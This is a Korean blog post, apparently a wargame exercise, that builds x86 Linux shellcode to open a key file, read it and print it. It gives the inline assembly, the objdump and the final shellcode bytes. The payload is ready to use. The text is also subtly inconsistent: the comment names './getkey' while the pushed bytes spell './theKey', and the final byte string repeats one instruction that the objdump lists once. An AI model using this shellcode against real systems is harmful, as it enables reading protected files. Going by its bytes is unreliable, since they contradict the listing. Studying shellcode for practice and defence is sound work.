[ read(open("getkey",0),buff,50)) -> write(stdout,buff); ]
#include<stdio.h>
int main()
{
asm(
//open("./getkey",0)*
"xor %eax, %eax\n"
"push %eax\n"
"push $0x79654b65\n"
"push $0x68742f2e\n" // [getkey] [NULL]
"mov %eax, %ecx\n"
"mov %esp, %ebx\n"
"movb $5, %al\n" // open = 5
"int $0x80\n"
//read(eax,buff,100);
"xor %edx,%edx\n"
"movb $0x50,%dl\n"
"sub $0x50,%esp\n"
"movl %esp,%ecx\n"
"movl %ecx,%edi\n"
"movl %eax,%ebx\n"
"xor %eax,%eax\n"
"movb $0x3,%al\n"
"int $0x80\n"
//write(1,buff);
"movl %edi, %ecx\n"
"xor %ebx,%ebx\n"
"xor %eax,%eax\n"
"movb $0x1, %bl\n"
"movb $0x4, %al\n"
"int $0x80\n"
);
return 0;
}
[ OBJDUMP ]
80483df: 31 c0 xor %eax,%eax
80483e1: 50 push %eax
80483e2: 68 65 4b 65 79 push $0x79654b65
80483e7: 68 2e 2f 74 68 push $0x68742f2e
80483ec: 89 c1 mov %eax,%ecx
80483ee: 89 e3 mov %esp,%ebx
80483f0: b0 05 mov $0x5,%al
80483f2: cd 80 int $0x80
80483f4: 31 d2 xor %edx,%edx
80483f6: b2 50 mov $0x50,%dl
80483f8: 83 ec 50 sub $0x50,%esp
80483fb: 89 e1 mov %esp,%ecx
80483fd: 89 cf mov %ecx,%edi
80483ff: 89 c3 mov %eax,%ebx
8048401: 31 c0 xor %eax,%eax
8048403: b0 03 mov $0x3,%al
8048405: cd 80 int $0x80
8048407: 89 f9 mov %edi,%ecx
8048409: 31 db xor %ebx,%ebx
804840b: 31 c0 xor %eax,%eax
804840d: b3 01 mov $0x1,%bl
804840f: b0 04 mov $0x4,%al
8048411: cd 80 int $0x80
[ 최종 쉘코드 ]
\x31\xc0\x50\x68\x65\x4b\x65\x79\x68\x2e\x2f\x74\x68
\x89\xc1\x89\xe3\xb0\x05\xcd\x80\x31\xd2\xb2\x50\x83
\xec\x50\x89\xe1\x89\xcf\x89\xcf\x89\xc3\x31\xc0\xb0
\x03\xcd\x80\x89\xf9\x31\xdb\x31\xc0\xb3\x01\xb0\x04
\xcd\x80
'System_Hacking' 카테고리의 다른 글
| [ 펌 ] win gdb 명령어 (0) | 2013.12.12 |
|---|---|
| [gdb] gdb find 의 활용 (원하는 메모리 값 찾기) (0) | 2013.10.09 |
| 32bit unistd.h System call Number (0) | 2013.07.21 |
| GDB 명령어 완벽 가이드 (0) | 2013.06.10 |
| [R.O.P.] ropeme 사용하여 ROP 가젯 쉽게 구하기. (0) | 2013.04.19 |
